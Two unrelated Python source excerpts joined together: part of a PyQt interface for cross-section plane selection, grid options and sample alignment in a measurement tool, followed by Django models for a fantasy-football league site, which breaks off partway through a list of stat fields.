self.button_group.addButton(self.line_selector, GraphicsScene.Mode.Draw_line.value)
self.button_group.addButton(self.area_selector, GraphicsScene.Mode.Draw_area.value)
selector_layout.addWidget(self.object_selector)
selector_layout.addWidget(self.point_selector)
selector_layout.addWidget(self.line_selector)
selector_layout.addWidget(self.area_selector)
selector_layout.addStretch(1)
self.createLineToolWidget()
self.createAreaToolWidget()
layout.addLayout(selector_layout)
layout.addWidget(self.line_tool_widget)
layout.addWidget(self.area_tool_widget)
layout.addStretch(1)
select_tab = QtWidgets.QWidget()
select_tab.setLayout(layout)
self.tabs.addTab(create_scroll_area(select_tab), 'Selection Tools')
def createGridOptionsTab(self):
layout = QtWidgets.QVBoxLayout()
self.show_grid_checkbox = QtWidgets.QCheckBox('Show Grid')
self.show_grid_checkbox.stateChanged.connect(self.showGrid)
self.snap_to_grid_checkbox = QtWidgets.QCheckBox('Snap Selection to Grid')
self.snap_to_grid_checkbox.stateChanged.connect(self.snapToGrid)
self.snap_to_grid_checkbox.setEnabled(self.view.show_grid)
layout.addWidget(self.show_grid_checkbox)
layout.addWidget(self.snap_to_grid_checkbox)
self.createGridWidget()
layout.addWidget(self.grid_widget)
layout.addStretch(1)
grid_tab = QtWidgets.QWidget()
grid_tab.setLayout(layout)
self.tabs.addTab(create_scroll_area(grid_tab), 'Grid Options')
def createCustomPlaneBox(self):
self.custom_plane_widget = QtWidgets.QWidget(self)
layout = QtWidgets.QVBoxLayout()
self.form_group = FormGroup(FormGroup.Layout.Horizontal)
self.x_axis = FormControl('X', 1.0, required=True, number=True)
self.x_axis.range(-1.0, 1.0)
self.y_axis = FormControl('Y', 0.0, required=True, number=True)
self.y_axis.range(-1.0, 1.0)
self.z_axis = FormControl('Z', 0.0, required=True, number=True)
self.z_axis.range(-1.0, 1.0)
self.form_group.addControl(self.x_axis)
self.form_group.addControl(self.y_axis)
self.form_group.addControl(self.z_axis)
self.form_group.groupValidation.connect(self.setCustomPlane)
layout.addWidget(self.form_group)
self.custom_plane_widget.setLayout(layout)
def createLineToolWidget(self):
self.line_tool_widget = QtWidgets.QWidget(self)
layout = QtWidgets.QHBoxLayout()
layout.setContentsMargins(0, 20, 0, 0)
layout.addWidget(QtWidgets.QLabel('Number of Points: '))
self.line_point_count_spinbox = QtWidgets.QSpinBox()
self.line_point_count_spinbox.setValue(self.scene.line_tool_size)
self.line_point_count_spinbox.setRange(2, 100)
self.line_point_count_spinbox.valueChanged.connect(self.scene.setLineToolSize)
layout.addWidget(self.line_point_count_spinbox)
self.line_tool_widget.setVisible(False)
self.line_tool_widget.setLayout(layout)
def createAreaToolWidget(self):
self.area_tool_widget = QtWidgets.QWidget(self)
layout = QtWidgets.QHBoxLayout()
layout.setContentsMargins(0, 20, 0, 0)
layout.addWidget(QtWidgets.QLabel('Number of Points: '))
self.area_x_spinbox = QtWidgets.QSpinBox()
self.area_x_spinbox.setValue(self.scene.area_tool_size[0])
self.area_x_spinbox.setRange(2, 100)
self.area_y_spinbox = QtWidgets.QSpinBox()
self.area_y_spinbox.setValue(self.scene.area_tool_size[1])
self.area_y_spinbox.setRange(2, 100)
stretch_factor = 3
layout.addStretch(1)
layout.addWidget(QtWidgets.QLabel('X: '))
self.area_x_spinbox.valueChanged.connect(lambda: self.scene.setAreaToolSize(self.area_x_spinbox.value(),
self.area_y_spinbox.value()))
layout.addWidget(self.area_x_spinbox, stretch_factor)
layout.addStretch(1)
layout.addWidget(QtWidgets.QLabel('Y: '))
self.area_y_spinbox.valueChanged.connect(lambda: self.scene.setAreaToolSize(self.area_x_spinbox.value(),
self.area_y_spinbox.value()))
layout.addWidget(self.area_y_spinbox, stretch_factor)
self.area_tool_widget.setVisible(False)
self.area_tool_widget.setLayout(layout)
def createGridWidget(self):
self.grid_widget = QtWidgets.QWidget(self)
main_layout = QtWidgets.QVBoxLayout()
main_layout.setContentsMargins(0, 20, 0, 0)
layout = QtWidgets.QHBoxLayout()
layout.addWidget(QtWidgets.QLabel('Grid Type: '))
grid_combobox = QtWidgets.QComboBox()
grid_combobox.setView(QtWidgets.QListView())
grid_combobox.addItems([g.value for g in Grid.Type])
grid_combobox.currentTextChanged.connect(lambda value: self.setGridType(Grid.Type(value)))
layout.addWidget(grid_combobox)
main_layout.addLayout(layout)
main_layout.addSpacing(20)
layout = QtWidgets.QHBoxLayout()
layout.addWidget(QtWidgets.QLabel('Grid Size: '))
self.grid_x_label = QtWidgets.QLabel('')
self.grid_x_spinbox = QtWidgets.QDoubleSpinBox()
self.grid_x_spinbox.setDecimals(1)
self.grid_x_spinbox.setSingleStep(0.1)
self.grid_x_spinbox.valueChanged.connect(self.changeGridSize)
self.grid_y_label = QtWidgets.QLabel('')
self.grid_y_spinbox = QtWidgets.QDoubleSpinBox()
self.grid_y_spinbox.setDecimals(1)
self.grid_y_spinbox.setSingleStep(0.1)
self.grid_y_spinbox.valueChanged.connect(self.changeGridSize)
stretch_factor = 3
layout.addStretch(1)
layout.addWidget(self.grid_x_label)
layout.addWidget(self.grid_x_spinbox, stretch_factor)
layout.addStretch(1)
layout.addWidget(self.grid_y_label)
layout.addWidget(self.grid_y_spinbox, stretch_factor)
main_layout.addLayout(layout)
self.setGridType(self.view.grid.type)
self.grid_widget.setVisible(False)
self.grid_widget.setLayout(main_layout)
def changeGridSize(self):
if self.view.grid.type == Grid.Type.Box:
grid_x = int(self.grid_x_spinbox.value() * self.sample_scale)
grid_y = int(self.grid_y_spinbox.value() * self.sample_scale)
else:
grid_x = int(self.grid_x_spinbox.value() * self.sample_scale)
grid_y = self.grid_y_spinbox.value()
self.view.setGridSize((grid_x, grid_y))
def setGridType(self, grid_type):
self.view.setGridType(grid_type)
size = self.view.grid.size
if grid_type == Grid.Type.Box:
self.grid_x_label.setText('X (mm): ')
self.grid_y_label.setText('Y (mm): ')
self.grid_x_spinbox.setValue(size[0])
self.grid_y_spinbox.setValue(size[1])
self.grid_x_spinbox.setRange(0.1, 1000)
self.grid_y_spinbox.setRange(0.1, 1000)
else:
self.grid_x_label.setText('Radius (mm): ')
self.grid_y_label.setText('Angle (degree): ')
self.grid_x_spinbox.setValue(size[0])
self.grid_y_spinbox.setValue(size[1])
self.grid_x_spinbox.setRange(0.1, 1000)
self.grid_y_spinbox.setRange(0.1, 360)
def changeSceneMode(self, button_id):
self.scene.mode = GraphicsScene.Mode(button_id)
self.line_tool_widget.setVisible(self.scene.mode == GraphicsScene.Mode.Draw_line)
self.area_tool_widget.setVisible(self.scene.mode == GraphicsScene.Mode.Draw_area)
def showHelp(self):
self.view.show_help = False if self.view.has_foreground else True
self.scene.update()
def showGrid(self, state):
self.view.show_grid = True if state == QtCore.Qt.Checked else False
self.snap_to_grid_checkbox.setEnabled(self.view.show_grid)
self.grid_widget.setVisible(self.view.show_grid)
self.scene.update()
def snapToGrid(self, state):
self.view.snap_to_grid = True if state == QtCore.Qt.Checked else False
def updateSlider(self, value):
if not self.plane_lineedit.hasAcceptableInput():
return
new_distance = clamp(float(value), *self.plane_offset_range)
slider_value = int(map_range(*self.plane_offset_range, *self.slider_range, new_distance))
self.plane_slider.setValue(slider_value)
offset = new_distance - self.old_distance
self.parent.scenes.drawPlane(shift_by=offset * self.plane.normal)
self.old_distance = new_distance
def updateLineEdit(self, value):
new_distance = trunc(map_range(*self.slider_range, *self.plane_offset_range, value), 3)
self.plane_lineedit.setText('{:.3f}'.format(new_distance))
offset = new_distance - self.old_distance
self.parent.scenes.drawPlane(shift_by=offset * self.plane.normal)
self.old_distance = new_distance
def movePlane(self):
distance = clamp(float(self.plane_lineedit.text()), *self.plane_offset_range)
self.plane_lineedit.setText('{:.3f}'.format(distance))
point = distance * self.plane.normal
self.plane = Plane(self.plane.normal, point)
self.updateCrossSection()
def setCustomPlane(self, is_valid):
if is_valid:
normal = np.array([self.x_axis.value, self.y_axis.value, self.z_axis.value])
try:
self.initializePlane(normal, self.mesh.bounding_box.center)
except ValueError:
self.x_axis.validation_label.setText('Bad Normal')
def setPlane(self, selected_text):
if selected_text == PlaneOptions.Custom.value:
self.custom_plane_widget.setVisible(True)
self.form_group.validateGroup()
return
else:
self.custom_plane_widget.setVisible(False)
if selected_text == PlaneOptions.XY.value:
plane_normal = np.array([0., 0., 1.])
elif selected_text == PlaneOptions.XZ.value:
plane_normal = np.array([0., 1., 0.])
else:
plane_normal = np.array([1., 0., 0.])
self.initializePlane(plane_normal, self.mesh.bounding_box.center)
def initializePlane(self, plane_normal, plane_point):
self.plane = Plane(plane_normal, plane_point)
plane_size = self.mesh.bounding_box.radius
self.parent.scenes.drawPlane(self.plane, 2 * plane_size, 2 * plane_size)
distance = self.plane.distanceFromOrigin()
self.plane_offset_range = (distance - plane_size, distance + plane_size)
slider_value = int(map_range(*self.plane_offset_range, *self.slider_range, distance))
self.plane_slider.setValue(slider_value)
self.plane_lineedit.setText('{:.3f}'.format(distance))
self.old_distance = distance
# inverted the normal so that the y-axis is flipped
self.matrix = self.__lookAt(-Vector3(self.plane.normal))
self.view.resetTransform()
self.updateCrossSection()
def updateCrossSection(self):
self.scene.clear()
segments = mesh_plane_intersection(self.mesh, self.plane)
if len(segments) == 0:
return
segments = np.array(segments)
item = QtWidgets.QGraphicsPathItem()
cross_section_path = QtGui.QPainterPath()
rotated_segments = self.sample_scale * (segments @ self.matrix)
for i in range(0, rotated_segments.shape[0], 2):
start = rotated_segments[i, :]
cross_section_path.moveTo(start[0], start[1])
end = rotated_segments[i + 1, :]
cross_section_path.lineTo(end[0], end[1])
item.setPath(cross_section_path)
item.setPen(self.path_pen)
item.setTransform(self.view.scene_transform)
self.scene.addItem(item)
rect = item.boundingRect()
anchor = rect.center()
ab = self.plane.point - self.parent_model.measurement_points.points
d = np.einsum('ij,ij->i', np.expand_dims(self.plane.normal, axis=0), ab)
index = np.where(np.abs(d) < VECTOR_EPS)[0]
rotated_points = self.parent_model.measurement_points.points[index, :]
rotated_points = rotated_points @ self.matrix
for i, p in zip(index, rotated_points):
point = QtCore.QPointF(p[0], p[1]) * self.sample_scale
point = self.view.scene_transform.map(point)
item = GraphicsPointItem(point, size=self.scene.point_size)
item.setToolTip(f'Point {i + 1}')
item.fixed = True
item.makeControllable(self.scene.mode == GraphicsScene.Mode.Select)
item.setPen(self.point_pen)
self.scene.addItem(item)
rect = rect.united(item.boundingRect().translated(point))
# calculate new rectangle that encloses original rect with a different anchor
rect.united(rect.translated(anchor - rect.center()))
self.view.setSceneRect(rect)
self.view.fitInView(rect, QtCore.Qt.KeepAspectRatio)
self.view.anchor = rect
@staticmethod
def __lookAt(forward):
rot_matrix = Matrix33.identity()
up = Vector3([0., -1., 0.]) if -VECTOR_EPS < forward[1] < VECTOR_EPS else Vector3([0., 0., 1.])
left = up ^ forward
left.normalize()
up = forward ^ left
rot_matrix.c1[:3] = left
rot_matrix.c2[:3] = up
rot_matrix.c3[:3] = forward
return rot_matrix
def addPoints(self):
if len(self.scene.items()) < 2:
return
points_2d = []
transform = self.view.scene_transform.inverted()[0]
for item in self.scene.items():
if isinstance(item, GraphicsPointItem) and not item.fixed:
pos = transform.map(item.pos()) / self.sample_scale
# negate distance due to inverted normal when creating matrix
points_2d.append([pos.x(), pos.y(), -self.old_distance])
self.scene.removeItem(item)
if not points_2d:
return
points = points_2d[::-1] @ self.matrix.transpose()
enabled = [True] * points.shape[0]
self.parent.presenter.addPoints(list(zip(points, enabled)), PointType.Measurement, False)
class AlignSample(QtWidgets.QWidget):
"""Provides UI for aligning sample on instrument with 6D pose
:param parent: Main window
:type parent: MainWindow
"""
dock_flag = DockFlag.Upper
def __init__(self, parent):
super().__init__(parent)
self.parent = parent
self.parent.scenes.switchToInstrumentScene()
self.title = 'Align Sample with 6D pose'
self.setMinimumWidth(450)
self.main_layout = QtWidgets.QVBoxLayout()
self.setLayout(self.main_layout)
self.main_layout.addSpacing(20)
self.main_layout.addWidget(FormTitle('Create Transformation for Alignment'))
self.main_layout.addSpacing(10)
self.main_layout.addWidget(QtWidgets.QLabel('Translation along the X, Y, and Z axis (mm):'))
self.position_form_group = FormGroup(FormGroup.Layout.Horizontal)
self.x_position = FormControl('X', 0.0, required=True, number=True)
self.y_position = FormControl('Y', 0.0, required=True, number=True)
self.z_position = FormControl('Z', 0.0, required=True, number=True)
self.position_form_group.addControl(self.x_position)
self.position_form_group.addControl(self.y_position)
self.position_form_group.addControl(self.z_position)
self.position_form_group.groupValidation.connect(self.formValidation)
self.main_layout.addWidget(self.position_form_group)
self.main_layout.addWidget(QtWidgets.QLabel('Rotation around the X, Y, and Z axis (degrees):'))
self.orientation_form_group = FormGroup(FormGroup.Layout.Horizontal)
self.x_rotation = FormControl('X', 0.0, required=True, number=True)
self.x_rotation.range(-360.0, 360.0)
self.y_rotation = FormControl('Y', 0.0, required=True, number=True)
self.y_rotation.range(-360.0, 360.0)
self.z_rotation = FormControl('Z', 0.0, required=True, number=True)
self.z_rotation.range(-360.0, 360.0)
self.orientation_form_group.addControl(self.x_rotation)
self.orientation_form_group.addControl(self.y_rotation)
self.orientation_form_group.addControl(self.z_rotation)
self.orientation_form_group.groupValidation.connect(self.formValidation)
self.main_layout.addWidget(self.orientation_form_group)
button_layout = QtWidgets.QHBoxLayout()
self.execute_button = QtWidgets.QPushButton('Align Sample')
self.execute_button.clicked.connect(self.executeButtonClicked)
button_layout.addWidget(self.execute_button)
button_layout.addStretch(1)
self.main_layout.addLayout(button_layout)
self.main_layout.addStretch(1)
def formValidation(self):
if self.position_form_group.valid and self.orientation_form_group.valid:
self.execute_button.setEnabled(True)
else:
self.execute_button.setDisabled(True)
def executeButtonClicked(self):
pose = [self.x_position.value, self.y_position.value, self.z_position.value,
self.x_rotation.value, self.y_rotation.value, self.z_rotation.value]
self.parent.presenter.alignSampleWithPose(pose)
|
# -*- coding: utf-8 -*-
import os
import datetime
import pytz
from django.db import models
from django.contrib.auth.models import User
from common.current_week import get_current_week
from common.hashing import generate_hash, compare_hash
def get_safe(model_name, **kwargs):
# a modified get() function that returns a single matching object if one exists
# or None otherwise (doesn't raise an Exception)
models = {'Game': Game, 'Player': Player, 'Team': Team, 'League': League,
'LeagueStat': LeagueStat, 'Lineup': Lineup, 'Member': Member,
'StatCondition': StatCondition, 'User': User}
model = models[model_name]
data = model.objects.filter(**kwargs)
if len(data) == 1:
return data[0]
else:
return None
class SeasonType(models.TextChoices):
PRE = 'PRE'
REG = 'REG'
PRO = 'PRO'
POST = 'POST'
class Game(models.Model):
game_id = models.CharField(primary_key=True, max_length=36)
start_time = models.DateTimeField()
season_type = models.CharField(max_length=4, choices=SeasonType.choices)
season_year = models.SmallIntegerField()
week = models.SmallIntegerField()
phase = models.TextField(null=True)
attendance = models.IntegerField(null=True)
stadium = models.TextField(null=True)
home_score = models.SmallIntegerField(null=True, default=0)
home_score_q1 = models.SmallIntegerField(null=True, default=0)
home_score_q2 = models.SmallIntegerField(null=True, default=0)
home_score_q3 = models.SmallIntegerField(null=True, default=0)
home_score_q4 = models.SmallIntegerField(null=True, default=0)
home_score_ot = models.SmallIntegerField(null=True, default=0)
away_score = models.SmallIntegerField(null=True, default=0)
away_score_q1 = models.SmallIntegerField(null=True, default=0)
away_score_q2 = models.SmallIntegerField(null=True, default=0)
away_score_q3 = models.SmallIntegerField(null=True, default=0)
away_score_q4 = models.SmallIntegerField(null=True, default=0)
away_score_ot = models.SmallIntegerField(null=True, default=0)
home_team = models.ForeignKey('Team', models.DO_NOTHING, db_column='home_team',
related_name='home_team')
away_team = models.ForeignKey('Team', models.DO_NOTHING, db_column='away_team',
related_name='away_team')
weather = models.TextField(null=True)
modified_at = models.DateTimeField(auto_now=True)
def __repr__(self):
return f"{{'model': 'Game', 'game_id': '{self.game_id}'}}"
def __str__(self):
return f"{{Game '{self.game_id}'}}"
def __eq__(self, other):
if isinstance(other, Game):
return (self.game_id == other.game_id)
else:
return NotImplemented
def __hash__(self):
return hash(('Game', self.game_id))
def data_dict(self):
return {'id': self.game_id, 'start_time':
self.start_time.strftime("%Y-%m-%d %H:%M"), 'season_type': self.season_type,
'season_year': self.season_year, 'week': self.week,
'home_team': self.home_team.team_id, 'away_team': self.away_team.team_id,
'home_score': self.home_score, 'away_score': self.away_score}
class Drive(models.Model):
game = models.ForeignKey('Game', models.CASCADE)
drive_id = models.SmallIntegerField()
start_quarter = models.SmallIntegerField(null=True)
end_quarter = models.SmallIntegerField(null=True)
start_transition = models.TextField(null=True)
end_transition = models.TextField(null=True)
start_field = models.TextField(null=True)
end_field = models.TextField(null=True)
start_time = models.TextField(null=True)
end_time = models.TextField(null=True)
pos_team = models.ForeignKey('Team', models.DO_NOTHING)
pos_time = models.TextField(null=True)
first_downs = models.SmallIntegerField(null=True)
penalty_yards = models.SmallIntegerField(null=True)
yards_gained = models.SmallIntegerField(null=True)
play_count = models.SmallIntegerField(null=True)
def __repr__(self):
return (f"{{'model': 'Drive', 'game_id': '{self.game.game_id}', "
f"'drive_id': {self.drive_id}}}")
def __str__(self):
return f"{{Drive {self.drive_id} from Game '{self.game.game_id}'}}"
def __eq__(self, other):
if isinstance(other, Drive):
return (self.id == other.id)
else:
return NotImplemented
def __hash__(self):
return hash(('Drive', self.id))
class Play(models.Model):
drive = models.ForeignKey('Drive', models.CASCADE)
play_id = models.SmallIntegerField()
time = models.TextField(null=True)
down = models.SmallIntegerField(null=True)
start_yardline = models.TextField(null=True)
end_yardline = models.TextField(null=True)
first_down = models.BooleanField(null=True)
penalty = models.BooleanField(null=True)
description = models.TextField(null=True)
play_type = models.TextField(null=True)
pos_team = models.ForeignKey('Team', models.DO_NOTHING, db_column='pos_team')
quarter = models.SmallIntegerField(null=True)
yards_to_go = models.SmallIntegerField(null=True)
def __repr__(self):
return (f"{{'model': 'Play', 'game_id': '{self.drive.game.game_id}', "
f"'drive_id': {self.drive.drive_id}, 'play_id': {self.play_id}}}")
def __str__(self):
return (f"{{Play {self.play_id} from Drive {self.drive.drive_id} from Game "
f"'{self.drive.game.game_id}'}}")
def __eq__(self, other):
if isinstance(other, Play):
return (self.id == other.id)
else:
return NotImplemented
def __hash__(self):
return hash(('Play', self.id))
class PlayPlayer(models.Model):
play = models.ForeignKey('Play', models.CASCADE)
player = models.ForeignKey('Player', models.DO_NOTHING)
team = models.ForeignKey('Team', models.DO_NOTHING, db_column='team')
defense_ast = models.SmallIntegerField(default=0)
defense_ffum = models.SmallIntegerField(default=0)
defense_fgblk = models.SmallIntegerField(default=0)
defense_frec = models.SmallIntegerField(default=0)
defense_frec_tds = models.SmallIntegerField(default=0)
defense_frec_yds = models.SmallIntegerField(default=0)
defense_int = models.SmallIntegerField(default=0)
defense_int_tds = models.SmallIntegerField(default=0)
defense_int_yds = models.SmallIntegerField(default=0)
defense_misc_tds = models.SmallIntegerField(default=0)
defense_misc_yds = models.SmallIntegerField(default=0)
defense_pass_def = models.SmallIntegerField(default=0)
defense_puntblk = models.SmallIntegerField(default=0)
defense_qbhit = models.SmallIntegerField(default=0)
defense_safe = models.SmallIntegerField(default=0)
defense_sk = models.FloatField(default=0)
defense_sk_yds = models.SmallIntegerField(default=0)
defense_tds = models.SmallIntegerField(default=0)
defense_tkl = models.SmallIntegerField(default=0)
defense_tkl_loss = models.SmallIntegerField(default=0)
defense_tkl_loss_yds = models.SmallIntegerField(default=0)
defense_tkl_primary = models.SmallIntegerField(default=0)
defense_xpblk = models.SmallIntegerField(default=0)
first_down = models.SmallIntegerField(default=0)
fourth_down_att = models.SmallIntegerField(default=0)
fourth_down_conv = models.SmallIntegerField(default=0)
fourth_down_failed = models.SmallIntegerField(default=0)
fumbles_forced = models.SmallIntegerField(default=0)
fumbles_lost = models.SmallIntegerField(default=0)
fumbles_notforced = models.SmallIntegerField(default=0)
fumbles_oob = models.SmallIntegerField(default=0)
fumbles_rec = models.SmallIntegerField(default=0)
fumbles_rec_tds = models.SmallIntegerField(default=0)
fumbles_rec_yds = models.SmallIntegerField(default=0)
fumbles_tot = models.SmallIntegerField(default=0)
kicking_all_yds = models.SmallIntegerField(default=0)
kicking_downed = models.SmallIntegerField(default=0)
kicking_fga = models.SmallIntegerField(default=0)
kicking_fgb = models.SmallIntegerField(default=0)
kicking_fgm = models.SmallIntegerField(default=0)
kicking_fgm_yds = models.SmallIntegerField(default=0)
kicking_fgmissed = models.SmallIntegerField(default=0)
kicking_fgmissed_yds = models.SmallIntegerField(default=0)
kicking_i20 = models.SmallIntegerField(default=0)
kicking_rec = models.SmallIntegerField(default=0)
kicking_rec_tds = models.SmallIntegerField(default=0)
kicking_tot = models.SmallIntegerField(default=0)
kicking_touchback = models.SmallIntegerField(default=0)
kicking_xpa = models.SmallIntegerField(default=0)
kicking_xpb = models.SmallIntegerField(default=0)
kicking_xpmade = models.SmallIntegerField(default=0)
kicking_xpmissed = models.SmallIntegerField(default=0)
kicking_yds = models.SmallIntegerField(default=0)
kickret_fair = models.SmallIntegerField(default=0)
kickret_oob = models.SmallIntegerField(default=0)
kickret_ret = models.SmallIntegerField(default=0)
kickret_tds = models.SmallIntegerField(default=0)
kickret_touchback = models.SmallIntegerField(default=0)
kickret_yds = models.SmallIntegerField(default=0)
passing_att = models.SmallIntegerField(default=0)
passing_cmp = models.SmallIntegerField(default=0)
passing_cmp_air_yds = models.SmallIntegerField(default=0)
passing_incmp = models.SmallIntegerField(default=0)
passing_incmp_air_yds = models.SmallIntegerField(default=0)
passing_int = models.SmallIntegerField(default=0)
passing_sk = models.SmallIntegerField(default=0)
passing_sk_yds = models.SmallIntegerField(default=0)
passing_tds = models.SmallIntegerField(default=0)
passing_twopta = models.SmallIntegerField(default=0)
passing_twoptm = models.SmallIntegerField(default=0)
passing_twoptmissed = models.SmallIntegerField(default=0)
passing_yds = models.SmallIntegerField(default=0)
penalty = models.SmallIntegerField(default=0)
penalty_first_down = models.SmallIntegerField(default=0)
penalty_yds = models.SmallIntegerField(default=0)
punting_blk = models.SmallIntegerField(default=0)
punting_i20 = models.SmallIntegerField(default=0)
punting_tot = models.SmallIntegerField(default=0)
punting_touchback = models.SmallIntegerField(default=0)
punting_yds = models.SmallIntegerField(default=0)
puntret_downed = models.SmallIntegerField(default=0)
puntret_fair = models.SmallIntegerField(default=0)
puntret_oob = models.SmallIntegerField(default=0)
puntret_tds = models.SmallIntegerField(default=0)
puntret_tot = models.SmallIntegerField(default=0)
puntret_touchback = models.SmallIntegerField(default=0)
puntret_yds = models.SmallIntegerField(default=0)
receiving_rec = models.SmallIntegerField(default=0)
receiving_tar = models.SmallIntegerField(default=0)
receiving_tds = models.SmallIntegerField(default=0)
receiving_twopta = models.SmallIntegerField(default=0)
receiving_twoptm = models.SmallIntegerField(default=0)
receiving_twoptmissed = models.SmallIntegerField(default=0)
receiving_yac_yds = models.SmallIntegerField(default=0)
receiving_yds = models.SmallIntegerField(default=0)
rushing_att = models.SmallIntegerField(default=0)
rushing_first_down = models.SmallIntegerField(default=0)
rushing_loss = models.SmallIntegerField(default=0)
rushing_loss_yds = models.SmallIntegerField(default=0)
rushing_tds = models.SmallIntegerField(default=0)
rushing_twopta = models.SmallIntegerField(default=0)
rushing_twoptm = models.SmallIntegerField(default=0)
rushing_twoptmissed = models.SmallIntegerField(default=0)
rushing_yds = models.SmallIntegerField(default=0)
third_down_att = models.SmallIntegerField(default=0)
third_down_conv = models.SmallIntegerField(default=0)
third_down_failed = models.SmallIntegerField(default=0)
timeout = models.SmallIntegerField(default=0)
xp_aborted = models.SmallIntegerField(default=0)
def __repr__(self):
return (f"{{'model': 'PlayPlayer', 'player': '{self.player.player_id}', "
f"'game_id': '{self.play.drive.game.game_id}', 'drive_id': "
f"{self.play.drive.drive_id}, 'play_id': {self.play.play_id}}}")
def __str__(self):
return (f"{{Player '{self.player.player_id}' from Play {self.play.play_id} "
f"from Drive {self.play.drive.drive_id} from Game "
f"'{self.play.drive.game.game_id}'}}")
def __eq__(self, other):
if isinstance(other, PlayPlayer):
return (self.id == other.id)
else:
return NotImplemented
def __hash__(self):
return hash(('PlayPlayer', self.id))
class Player(models.Model):
player_id = models.CharField(primary_key=True, max_length=36)
name = models.TextField()
team = models.ForeignKey('Team', models.DO_NOTHING, db_column='team', null=True)
position = models.TextField()
status = models.TextField(null=True)
jersey_number = models.SmallIntegerField(null=True)
def __repr__(self):
return f"{{'model': 'Player', 'player_id': '{self.player_id}'}}"
def __str__(self):
return f"{{{self.name} {self.position} {self.team.team_id}}}"
def __eq__(self, other):
if isinstance(other, Player):
return (self.player_id == other.player_id)
else:
return NotImplemented
def __hash__(self):
return hash(('Player', self.player_id))
def data_dict(self):
return {'id': self.player_id, 'name': self.name, 'team':
self.team.team_id, 'position': self.position, 'status': self.status}
def is_locked(self):
season_year, season_type, week = get_current_week()
this_game = (Game.objects.filter(home_team=self.team,
season_type=season_type, season_year=season_year, week=week) |
(Game.objects.filter(away_team=self.team, season_type=season_type,
season_year=season_year, week=week)))
if len(this_game) == 1:
game_start = this_game[0].start_time.replace(tzinfo=pytz.UTC)
now = datetime.datetime.now(pytz.UTC)
if game_start < now:
return True
return False
class Team(models.Model):
team_id = models.CharField(primary_key=True, max_length=3)
name = models.TextField()
active = models.BooleanField()
def __repr__(self):
return f"{{'model': 'Team', 'team_id': '{self.team_id}'}}"
def __str__(self):
return f"{{{self.name}}}"
def __eq__(self, other):
if isinstance(other, Team):
return (self.team_id == other.team_id)
else:
return NotImplemented
def __hash__(self):
return hash(('Team', self.team_id))
def data_dict(self):
return {'id': self.team_id, 'name': self.name}
class League(models.Model):
name = models.TextField()
# league password is stored as hash
password = models.TextField()
# below are the number of positions included in a league's lineup
db = models.SmallIntegerField(default=0)
dl = models.SmallIntegerField(default=0)
k = models.SmallIntegerField(default=0)
lb = models.SmallIntegerField(default=0)
ol = models.SmallIntegerField(default=0)
p = models.SmallIntegerField(default=0)
qb = models.SmallIntegerField(default=0)
rb = models.SmallIntegerField(default=0)
te = models.SmallIntegerField(default=0)
wr = models.SmallIntegerField(default=0)
# pre built position list for convenience
positions = ['db', 'dl', 'k', 'lb', 'ol', 'p', 'qb', 'rb', 'te', 'wr']
def __repr__(self):
return f"{{'model': 'League', 'name': '{self.name}'}}"
def __str__(self):
return f"{{League {self.name}}}"
def __eq__(self, other):
if isinstance(other, League):
return (self.name == other.name)
else:
return NotImplemented
def __hash__(self):
return hash(('League', self.name))
def correct_password(self, password):
if compare_hash(self.password, password):
return True
else:
return False
def get_lineup_settings(self):
lineup = {}
for pos in self.positions:
if getattr(self, pos):
lineup[pos.upper()] = getattr(self, pos)
return lineup
def set_lineup_settings(self, lineup_settings):
for pos in self.positions:
if pos.upper() in lineup_settings:
setattr(self, pos, lineup_settings[pos.upper()])
else:
setattr(self, pos, 0)
self.save()
def get_scoring_settings(self):
scoring = []
for stat in LeagueStat.objects.filter(league=self):
scoring.append({'name': stat.name, 'field': stat.field,
'conditions': [], 'multiplier': float(stat.multiplier)})
if stat.conditions:
for condition in StatCondition.objects.filter(league_stat=stat):
scoring[-1]['conditions'].append({'field': condition.field,
'comparison': condition.comparison, 'value': condition.value})
return scoring
def set_scoring_settings(self, scoring):
# remove any stats that aren't in the new settings
all_names = [stat['name'] for stat in scoring]
for stat in LeagueStat.objects.filter(league=self):
if stat.name not in all_names:
stat.delete()
# add the new stats
for stat in scoring:
stat_row = LeagueStat.objects.get_or_create(league=self,
name=stat['name'])[0]
stat_row.field = stat['field']
stat_row.multiplier = stat['multiplier']
stat_row.save()
if stat['conditions']:
stat_row.conditions = True
stat_row.save()
# remove the old conditions
for condition in StatCondition.objects.filter(league_stat=stat_row):
condition.delete()
# add the new ones
for condition in stat['conditions']:
cond_row = StatCondition.objects.get_or_create(league_stat=stat_row,
field=condition['field'], comparison=condition['comparison'],
value=condition['value'])
def set_password(self, password):
self.password = generate_hash(password)
self.save()
def get_members(self):
return [member.user.username for member in
Member.objects.filter(league=self).order_by('user__username')]
class StatField(models.TextChoices):
DEFENSE_AST = 'defense_ast'
DEFENSE_FFUM = 'defense_ffum'
DEFENSE_FGBLK = 'defense_fgblk'
DEFENSE_FREC = 'defense_frec'
DEFENSE_FREC_TDS = 'defense_frec_tds'
DEFENSE_FREC_YDS = 'defense_frec_yds'
DEFENSE_INT = 'defense_int'
DEFENSE_INT_TDS = 'defense_int_tds'
DEFENSE_INT_YDS = 'defense_int_yds'
DEFENSE_MISC_TDS = 'defense_misc_tds'
DEFENSE_MISC_YDS = 'defense_misc_yds'
DEFENSE_PASS_DEF = 'defense_pass_def'
DEFENSE_PUNTBLK = 'defense_puntblk'
DEFENSE_QBHIT = 'defense_qbhit'
DEFENSE_SAFE = 'defense_safe'
DEFENSE_SK = 'defense_sk'
DEFENSE_SK_YDS = 'defense_sk_yds'
DEFENSE_TDS = 'defense_tds'
DEFENSE_TKL = 'defense_tkl'
DEFENSE_TKL_LOSS = 'defense_tkl_loss'
DEFENSE_TKL_LOSS_YDS = 'defense_tkl_loss_yds'
DEFENSE_TKL_PRIMARY = 'defense_tkl_primary'
DEFENSE_XPBLK = 'defense_xpblk'
FIRST_DOWN = 'first_down'
FOURTH_DOWN_ATT = 'fourth_down_att'
FOURTH_DOWN_CONV = 'fourth_down_conv'
FOURTH_DOWN_FAILED = 'fourth_down_failed'
FUMBLES_FORCED = 'fumbles_forced'
FUMBLES_LOST = 'fumbles_lost'
FUMBLES_NOTFORCED = 'fumbles_notforced'
FUMBLES_OOB = 'fumbles_oob'
FUMBLES_REC = 'fumbles_rec'
FUMBLES_REC_TDS = 'fumbles_rec_tds'
FUMBLES_REC_YDS = 'fumbles_rec_yds'
FUMBLES_TOT = 'fumbles_tot'
KICKING_ALL_YDS = 'kicking_all_yds'
KICKING_DOWNED = 'kicking_downed'
KICKING_FGA = 'kicking_fga'
KICKING_FGB = 'kicking_fgb'
